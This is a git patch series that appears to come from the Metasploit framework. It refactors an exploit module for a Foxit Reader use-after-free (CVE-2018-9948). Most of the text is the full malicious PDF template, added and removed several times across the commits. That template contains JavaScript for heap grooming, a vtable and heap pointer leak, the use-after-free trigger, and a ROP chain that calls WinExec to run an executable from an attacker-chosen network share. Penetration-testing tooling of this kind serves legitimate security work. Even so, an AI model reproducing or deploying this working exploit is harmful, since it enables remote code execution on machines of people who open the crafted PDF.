From 60cdd6dfe25a2f38153c00b6bd3e17374e7bb099 Mon Sep 17 00:00:00 2001
From: Shelby Pace <shelby_pace@rapid7.com>
Date: Wed, 5 Sep 2018 14:07:56 -0500
Subject: [PATCH 1/4] added erb file for foxit_reader_uaf exploit

---
 data/exploits/CVE-2018-9948/template_pdf.erb | 131 +++++++++++++++++++
 1 file changed, 131 insertions(+)
 create mode 100644 data/exploits/CVE-2018-9948/template_pdf.erb

diff --git a/data/exploits/CVE-2018-9948/template_pdf.erb b/data/exploits/CVE-2018-9948/template_pdf.erb
new file mode 100644
index 0000000000..3040f9ebd8
--- /dev/null
+++ b/data/exploits/CVE-2018-9948/template_pdf.erb
@@ -0,0 +1,131 @@
+require 'erb'
+require 'modules/exploits/windows/fileformat/foxit_reader_uaf'
+
+template = %q{
+  %PDF
+  1 0 obj
+  <</Pages 1 0 R /OpenAction 2 0 R>>
+  2 0 obj
+  <</S /JavaScript /JS (
+
+  var heap_ptr   = 0;
+  var foxit_base = 0;
+  var pwn_array  = [];
+
+  function prepare_heap(size){
+      var arr = new Array(size);
+      for(var i = 0; i < size; i++){
+          arr[i] = this.addAnnot({type: "Text"});;
+          if (typeof arr[i] == "object"){
+              arr[i].destroy();
+          }
+      }
+  }
+
+  function gc() {
+      const maxMallocBytes = 128 * 0x100000;
+      for (var i = 0; i < 3; i++) {
+          var x = new ArrayBuffer(maxMallocBytes);
+      }
+  }
+
+  function alloc_at_leak(){
+      for (var i = 0; i < 0x64; i++){
+          pwn_array[i] = new Int32Array(new ArrayBuffer(0x40));
+      }
+  }
+
+  function control_memory(){
+      for (var i = 0; i < 0x64; i++){
+          for (var j = 0; j < pwn_array[i].length; j++){
+              pwn_array[i][j] = foxit_base + 0x01a7ee23; // push ecx; pop esp; pop ebp; ret 4
+          }
+      }
+  }
+
+  function leak_vtable(){
+      var a = this.addAnnot({type: "Text"});
+
+      a.destroy();
+      gc();
+
+      prepare_heap(0x400);
+      var test = new ArrayBuffer(0x60);
+      var stolen = new Int32Array(test);
+
+      var leaked = stolen[0] & 0xffff0000;
+      foxit_base = leaked - 0x01f50000;
+  }
+
+  function leak_heap_chunk(){
+      var a = this.addAnnot({type: "Text"});
+      a.destroy();
+      prepare_heap(0x400);
+
+      var test = new ArrayBuffer(0x60);
+      var stolen = new Int32Array(test);
+
+      alloc_at_leak();
+      heap_ptr = stolen[1];
+  }
+
+  function reclaim(){
+      var arr = new Array(0x10);
+      for (var i = 0; i < arr.length; i++) {
+          arr[i] = new ArrayBuffer(0x60);
+          var rop = new Int32Array(arr[i]);
+
+          rop[0x00] = heap_ptr;                // pointer to our stack pivot from the TypedArray leak
+          rop[0x01] = foxit_base + 0x01a11d09; // xor ebx,ebx; or [eax],eax; ret
+          rop[0x02] = 0x72727272;              // junk
+          rop[0x03] = foxit_base + 0x00001450  // pop ebp; ret
+          rop[0x04] = 0xffffffff;              // ret of WinExec
+          rop[0x05] = foxit_base + 0x0069a802; // pop eax; ret
+          rop[0x06] = foxit_base + 0x01f2257c; // IAT WinExec
+          rop[0x07] = foxit_base + 0x0000c6c0; // mov eax,[eax]; ret
+          rop[0x08] = foxit_base + 0x00049d4e; // xchg esi,eax; ret
+          rop[0x09] = foxit_base + 0x00025cd6; // pop edi; ret
+          rop[0x0a] = foxit_base + 0x0041c6ca; // ret
+          rop[0x0b] = foxit_base + 0x000254fc; // pushad; ret
+          <%= rop %>
+          rop[0x17] = 0x00000000;              // adios, amigo
+      }
+  }
+
+  function trigger_uaf(){
+      var that = this;
+      var a = this.addAnnot({type:"Text", page: 0, name:"uaf"});
+      var arr = [1];
+      Object.defineProperties(arr,{
+          "0":{
+              get: function () {
+
+                  that.getAnnot(0, "uaf").destroy();
+
+                  reclaim();
+                  return 1;
+              }
+          }
+      });
+
+      a.point = arr;
+  }
+
+  function main(){
+      leak_heap_chunk();
+      leak_vtable();
+      control_memory();
+      trigger_uaf();
+  }
+
+  if (app.platform == "WIN"){
+      if (app.isFoxit == "Foxit Reader"){
+          if (app.appFoxitVersion == "9.0.1.1049"){
+              main();
+          }
+      }
+  }
+
+  )>> trailer <</Root 1 0 R>>
+
+}

From 6a3a4de289ef3f68e323c4bea7c51820e11b61ba Mon Sep 17 00:00:00 2001
From: Shelby Pace <shelby_pace@rapid7.com>
Date: Wed, 5 Sep 2018 14:09:10 -0500
Subject: [PATCH 2/4] included path to erb, removed multiline pdf string

---
 .../windows/fileformat/foxit_reader_uaf.rb    | 133 +-----------------
 1 file changed, 6 insertions(+), 127 deletions(-)

diff --git a/modules/exploits/windows/fileformat/foxit_reader_uaf.rb b/modules/exploits/windows/fileformat/foxit_reader_uaf.rb
index 7e0ddbdb43..784cea6485 100644
--- a/modules/exploits/windows/fileformat/foxit_reader_uaf.rb
+++ b/modules/exploits/windows/fileformat/foxit_reader_uaf.rb
@@ -84,133 +84,12 @@ class MetasploitModule < Msf::Exploit::Remote
 
     (max_index+1).upto(10) {|i| rop << "\nrop[0x%02x] = 0x00000000;" % (i+12)}
 
-    <<~PDFDOC
-%PDF
-1 0 obj
-<</Pages 1 0 R /OpenAction 2 0 R>>
-2 0 obj
-<</S /JavaScript /JS (
-
-var heap_ptr   = 0;
-var foxit_base = 0;
-var pwn_array  = [];
-
-function prepare_heap(size){
-    var arr = new Array(size);
-    for(var i = 0; i < size; i++){
-        arr[i] = this.addAnnot({type: "Text"});;
-        if (typeof arr[i] == "object"){
-            arr[i].destroy();
-        }
-    }
-}
-
-function gc() {
-    const maxMallocBytes = 128 * 0x100000;
-    for (var i = 0; i < 3; i++) {
-        var x = new ArrayBuffer(maxMallocBytes);
-    }
-}
-
-function alloc_at_leak(){
-    for (var i = 0; i < 0x64; i++){
-        pwn_array[i] = new Int32Array(new ArrayBuffer(0x40));
-    }
-}
-
-function control_memory(){
-    for (var i = 0; i < 0x64; i++){
-        for (var j = 0; j < pwn_array[i].length; j++){
-            pwn_array[i][j] = foxit_base + 0x01a7ee23; // push ecx; pop esp; pop ebp; ret 4
-        }
-    }
-}
-
-function leak_vtable(){
-    var a = this.addAnnot({type: "Text"});
-
-    a.destroy();
-    gc();
-
-    prepare_heap(0x400);
-    var test = new ArrayBuffer(0x60);
-    var stolen = new Int32Array(test);
-
-    var leaked = stolen[0] & 0xffff0000;
-    foxit_base = leaked - 0x01f50000;
-}
-
-function leak_heap_chunk(){
-    var a = this.addAnnot({type: "Text"});
-    a.destroy();
-    prepare_heap(0x400);
-
-    var test = new ArrayBuffer(0x60);
-    var stolen = new Int32Array(test);
-
-    alloc_at_leak();
-    heap_ptr = stolen[1];
-}
-
-function reclaim(){
-    var arr = new Array(0x10);
-    for (var i = 0; i < arr.length; i++) {
-        arr[i] = new ArrayBuffer(0x60);
-        var rop = new Int32Array(arr[i]);
-
-        rop[0x00] = heap_ptr;                // pointer to our stack pivot from the TypedArray leak
-        rop[0x01] = foxit_base + 0x01a11d09; // xor ebx,ebx; or [eax],eax; ret
-        rop[0x02] = 0x72727272;              // junk
-        rop[0x03] = foxit_base + 0x00001450  // pop ebp; ret
-        rop[0x04] = 0xffffffff;              // ret of WinExec
-        rop[0x05] = foxit_base + 0x0069a802; // pop eax; ret
-        rop[0x06] = foxit_base + 0x01f2257c; // IAT WinExec
-        rop[0x07] = foxit_base + 0x0000c6c0; // mov eax,[eax]; ret
-        rop[0x08] = foxit_base + 0x00049d4e; // xchg esi,eax; ret
-        rop[0x09] = foxit_base + 0x00025cd6; // pop edi; ret
-        rop[0x0a] = foxit_base + 0x0041c6ca; // ret
-        rop[0x0b] = foxit_base + 0x000254fc; // pushad; ret
-        #{rop}
-        rop[0x17] = 0x00000000;              // adios, amigo
-    }
-}
-
-function trigger_uaf(){
-    var that = this;
-    var a = this.addAnnot({type:"Text", page: 0, name:"uaf"});
-    var arr = [1];
-    Object.defineProperties(arr,{
-        "0":{
-            get: function () {
-
-                that.getAnnot(0, "uaf").destroy();
-
-                reclaim();
-                return 1;
-            }
-        }
-    });
-
-    a.point = arr;
-}
-
-function main(){
-    leak_heap_chunk();
-    leak_vtable();
-    control_memory();
-    trigger_uaf();
-}
-
-if (app.platform == "WIN"){
-    if (app.isFoxit == "Foxit Reader"){
-        if (app.appFoxitVersion == "9.0.1.1049"){
-            main();
-        }
-    }
-}
-
-)>> trailer <</Root 1 0 R>>
-    PDFDOC
+    begin
+      path = File.join(Msf::Config.install_root, 'data', 'exploits', 'CVE-2018-9948')
+      pdfDoc = ERB.new(File.read("#{path}/template_pdf.erb")).result(binding())
+    rescue
+      fail_with(Failure::NotFound, 'The PDF template was not found')
+    end
   end
 
   def exploit

From 55bf6e5dd49235a696a324f71118b9484cf960ae Mon Sep 17 00:00:00 2001
From: Shelby Pace <shelby_pace@rapid7.com>
Date: Wed, 5 Sep 2018 18:09:29 -0500
Subject: [PATCH 3/4] removed require in erb file

---
 data/exploits/CVE-2018-9948/template_pdf.erb            | 1 -
 modules/exploits/windows/fileformat/foxit_reader_uaf.rb | 1 +
 2 files changed, 1 insertion(+), 1 deletion(-)

diff --git a/data/exploits/CVE-2018-9948/template_pdf.erb b/data/exploits/CVE-2018-9948/template_pdf.erb
index 3040f9ebd8..c4c081be11 100644
--- a/data/exploits/CVE-2018-9948/template_pdf.erb
+++ b/data/exploits/CVE-2018-9948/template_pdf.erb
@@ -1,5 +1,4 @@
 require 'erb'
-require 'modules/exploits/windows/fileformat/foxit_reader_uaf'
 
 template = %q{
   %PDF
diff --git a/modules/exploits/windows/fileformat/foxit_reader_uaf.rb b/modules/exploits/windows/fileformat/foxit_reader_uaf.rb
index 784cea6485..77d4653154 100644
--- a/modules/exploits/windows/fileformat/foxit_reader_uaf.rb
+++ b/modules/exploits/windows/fileformat/foxit_reader_uaf.rb
@@ -87,6 +87,7 @@ class MetasploitModule < Msf::Exploit::Remote
     begin
       path = File.join(Msf::Config.install_root, 'data', 'exploits', 'CVE-2018-9948')
       pdfDoc = ERB.new(File.read("#{path}/template_pdf.erb")).result(binding())
+      pdfDoc
     rescue
       fail_with(Failure::NotFound, 'The PDF template was not found')
     end

From 254e8b9fd003532a0a5859f6b811281a9cfa9b0f Mon Sep 17 00:00:00 2001
From: Wei Chen <wei_chen@rapid7.com>
Date: Wed, 5 Sep 2018 21:47:57 -0500
Subject: [PATCH 4/4] Cleanup for foxit_reader_uaf

---
 data/exploits/CVE-2018-9948/template.pdf      | 125 +++++++++++++++++
 data/exploits/CVE-2018-9948/template_pdf.erb  | 130 ------------------
 .../windows/fileformat/foxit_reader_uaf.rb    |  16 +--
 3 files changed, 133 insertions(+), 138 deletions(-)
 create mode 100644 data/exploits/CVE-2018-9948/template.pdf
 delete mode 100644 data/exploits/CVE-2018-9948/template_pdf.erb

diff --git a/data/exploits/CVE-2018-9948/template.pdf b/data/exploits/CVE-2018-9948/template.pdf
new file mode 100644
index 0000000000..00a6064160
--- /dev/null
+++ b/data/exploits/CVE-2018-9948/template.pdf
@@ -0,0 +1,125 @@
+%PDF
+1 0 obj
+<</Pages 1 0 R /OpenAction 2 0 R>>
+2 0 obj
+<</S /JavaScript /JS (
+
+var heap_ptr   = 0;
+var foxit_base = 0;
+var pwn_array  = [];
+
+function prepare_heap(size){
+    var arr = new Array(size);
+    for(var i = 0; i < size; i++){
+        arr[i] = this.addAnnot({type: "Text"});;
+        if (typeof arr[i] == "object"){
+            arr[i].destroy();
+        }
+    }
+}
+
+function gc() {
+    const maxMallocBytes = 128 * 0x100000;
+    for (var i = 0; i < 3; i++) {
+        var x = new ArrayBuffer(maxMallocBytes);
+    }
+}
+
+function alloc_at_leak(){
+    for (var i = 0; i < 0x64; i++){
+        pwn_array[i] = new Int32Array(new ArrayBuffer(0x40));
+    }
+}
+
+function control_memory(){
+    for (var i = 0; i < 0x64; i++){
+        for (var j = 0; j < pwn_array[i].length; j++){
+            pwn_array[i][j] = foxit_base + 0x01a7ee23; // push ecx; pop esp; pop ebp; ret 4
+        }
+    }
+}
+
+function leak_vtable(){
+    var a = this.addAnnot({type: "Text"});
+
+    a.destroy();
+    gc();
+
+    prepare_heap(0x400);
+    var test = new ArrayBuffer(0x60);
+    var stolen = new Int32Array(test);
+
+    var leaked = stolen[0] & 0xffff0000;
+    foxit_base = leaked - 0x01f50000;
+}
+
+function leak_heap_chunk(){
+    var a = this.addAnnot({type: "Text"});
+    a.destroy();
+    prepare_heap(0x400);
+
+    var test = new ArrayBuffer(0x60);
+    var stolen = new Int32Array(test);
+
+    alloc_at_leak();
+    heap_ptr = stolen[1];
+}
+
+function reclaim(){
+    var arr = new Array(0x10);
+    for (var i = 0; i < arr.length; i++) {
+        arr[i] = new ArrayBuffer(0x60);
+        var rop = new Int32Array(arr[i]);
+
+        rop[0x00] = heap_ptr;                // pointer to our stack pivot from the TypedArray leak
+        rop[0x01] = foxit_base + 0x01a11d09; // xor ebx,ebx; or [eax],eax; ret
+        rop[0x02] = 0x72727272;              // junk
+        rop[0x03] = foxit_base + 0x00001450  // pop ebp; ret
+        rop[0x04] = 0xffffffff;              // ret of WinExec
+        rop[0x05] = foxit_base + 0x0069a802; // pop eax; ret
+        rop[0x06] = foxit_base + 0x01f2257c; // IAT WinExec
+        rop[0x07] = foxit_base + 0x0000c6c0; // mov eax,[eax]; ret
+        rop[0x08] = foxit_base + 0x00049d4e; // xchg esi,eax; ret
+        rop[0x09] = foxit_base + 0x00025cd6; // pop edi; ret
+        rop[0x0a] = foxit_base + 0x0041c6ca; // ret
+        rop[0x0b] = foxit_base + 0x000254fc; // pushad; ret
+        <%= rop %>
+        rop[0x17] = 0x00000000;              // adios, amigo
+    }
+}
+
+function trigger_uaf(){
+    var that = this;
+    var a = this.addAnnot({type:"Text", page: 0, name:"uaf"});
+    var arr = [1];
+    Object.defineProperties(arr,{
+        "0":{
+            get: function () {
+
+                that.getAnnot(0, "uaf").destroy();
+
+                reclaim();
+                return 1;
+            }
+        }
+    });
+
+    a.point = arr;
+}
+
+function main(){
+    leak_heap_chunk();
+    leak_vtable();
+    control_memory();
+    trigger_uaf();
+}
+
+if (app.platform == "WIN"){
+    if (app.isFoxit == "Foxit Reader"){
+        if (app.appFoxitVersion == "9.0.1.1049"){
+            main();
+        }
+    }
+}
+
+)>> trailer <</Root 1 0 R>>
diff --git a/data/exploits/CVE-2018-9948/template_pdf.erb b/data/exploits/CVE-2018-9948/template_pdf.erb
deleted file mode 100644
index c4c081be11..0000000000
--- a/data/exploits/CVE-2018-9948/template_pdf.erb
+++ /dev/null
@@ -1,130 +0,0 @@
-require 'erb'
-
-template = %q{
-  %PDF
-  1 0 obj
-  <</Pages 1 0 R /OpenAction 2 0 R>>
-  2 0 obj
-  <</S /JavaScript /JS (
-
-  var heap_ptr   = 0;
-  var foxit_base = 0;
-  var pwn_array  = [];
-
-  function prepare_heap(size){
-      var arr = new Array(size);
-      for(var i = 0; i < size; i++){
-          arr[i] = this.addAnnot({type: "Text"});;
-          if (typeof arr[i] == "object"){
-              arr[i].destroy();
-          }
-      }
-  }
-
-  function gc() {
-      const maxMallocBytes = 128 * 0x100000;
-      for (var i = 0; i < 3; i++) {
-          var x = new ArrayBuffer(maxMallocBytes);
-      }
-  }
-
-  function alloc_at_leak(){
-      for (var i = 0; i < 0x64; i++){
-          pwn_array[i] = new Int32Array(new ArrayBuffer(0x40));
-      }
-  }
-
-  function control_memory(){
-      for (var i = 0; i < 0x64; i++){
-          for (var j = 0; j < pwn_array[i].length; j++){
-              pwn_array[i][j] = foxit_base + 0x01a7ee23; // push ecx; pop esp; pop ebp; ret 4
-          }
-      }
-  }
-
-  function leak_vtable(){
-      var a = this.addAnnot({type: "Text"});
-
-      a.destroy();
-      gc();
-
-      prepare_heap(0x400);
-      var test = new ArrayBuffer(0x60);
-      var stolen = new Int32Array(test);
-
-      var leaked = stolen[0] & 0xffff0000;
-      foxit_base = leaked - 0x01f50000;
-  }
-
-  function leak_heap_chunk(){
-      var a = this.addAnnot({type: "Text"});
-      a.destroy();
-      prepare_heap(0x400);
-
-      var test = new ArrayBuffer(0x60);
-      var stolen = new Int32Array(test);
-
-      alloc_at_leak();
-      heap_ptr = stolen[1];
-  }
-
-  function reclaim(){
-      var arr = new Array(0x10);
-      for (var i = 0; i < arr.length; i++) {
-          arr[i] = new ArrayBuffer(0x60);
-          var rop = new Int32Array(arr[i]);
-
-          rop[0x00] = heap_ptr;                // pointer to our stack pivot from the TypedArray leak
-          rop[0x01] = foxit_base + 0x01a11d09; // xor ebx,ebx; or [eax],eax; ret
-          rop[0x02] = 0x72727272;              // junk
-          rop[0x03] = foxit_base + 0x00001450  // pop ebp; ret
-          rop[0x04] = 0xffffffff;              // ret of WinExec
-          rop[0x05] = foxit_base + 0x0069a802; // pop eax; ret
-          rop[0x06] = foxit_base + 0x01f2257c; // IAT WinExec
-          rop[0x07] = foxit_base + 0x0000c6c0; // mov eax,[eax]; ret
-          rop[0x08] = foxit_base + 0x00049d4e; // xchg esi,eax; ret
-          rop[0x09] = foxit_base + 0x00025cd6; // pop edi; ret
-          rop[0x0a] = foxit_base + 0x0041c6ca; // ret
-          rop[0x0b] = foxit_base + 0x000254fc; // pushad; ret
-          <%= rop %>
-          rop[0x17] = 0x00000000;              // adios, amigo
-      }
-  }
-
-  function trigger_uaf(){
-      var that = this;
-      var a = this.addAnnot({type:"Text", page: 0, name:"uaf"});
-      var arr = [1];
-      Object.defineProperties(arr,{
-          "0":{
-              get: function () {
-
-                  that.getAnnot(0, "uaf").destroy();
-
-                  reclaim();
-                  return 1;
-              }
-          }
-      });
-
-      a.point = arr;
-  }
-
-  function main(){
-      leak_heap_chunk();
-      leak_vtable();
-      control_memory();
-      trigger_uaf();
-  }
-
-  if (app.platform == "WIN"){
-      if (app.isFoxit == "Foxit Reader"){
-          if (app.appFoxitVersion == "9.0.1.1049"){
-              main();
-          }
-      }
-  }
-
-  )>> trailer <</Root 1 0 R>>
-
-}
diff --git a/modules/exploits/windows/fileformat/foxit_reader_uaf.rb b/modules/exploits/windows/fileformat/foxit_reader_uaf.rb
index 77d4653154..d311114578 100644
--- a/modules/exploits/windows/fileformat/foxit_reader_uaf.rb
+++ b/modules/exploits/windows/fileformat/foxit_reader_uaf.rb
@@ -62,7 +62,7 @@ class MetasploitModule < Msf::Exploit::Remote
     ])
   end
 
-  def pdfdoc
+  def get_pdf
     share = datastore['SHARE'].empty? ? "#{Rex::Text.rand_text_alpha_lower(1)}" : datastore['SHARE']
     fname = datastore['EXENAME'].empty? ? "#{Rex::Text.rand_text_alpha_lower(1)}.exe" : datastore['EXENAME']
     fname << '.exe' unless fname.ends_with?('.exe')
@@ -85,19 +85,19 @@ class MetasploitModule < Msf::Exploit::Remote
     (max_index+1).upto(10) {|i| rop << "\nrop[0x%02x] = 0x00000000;" % (i+12)}
 
     begin
-      path = File.join(Msf::Config.install_root, 'data', 'exploits', 'CVE-2018-9948')
-      pdfDoc = ERB.new(File.read("#{path}/template_pdf.erb")).result(binding())
-      pdfDoc
-    rescue
+      template = File.read(File.join(Msf::Config.data_directory, 'exploits', 'CVE-2018-9948', 'template.pdf'))
+      pdf_doc = ERB.new(template).result(binding())
+      pdf_doc
+    rescue Errno::ENOENT
       fail_with(Failure::NotFound, 'The PDF template was not found')
     end
   end
 
   def exploit
-    mypdf = pdfdoc
-    if mypdf.nil?
+    my_pdf = get_pdf
+    if my_pdf.nil?
       fail_with(Failure::BadConfig, 'The generated share path was greater than 44 bytes.')
     end
-    file_create(mypdf)
+    file_create(my_pdf)
   end
 end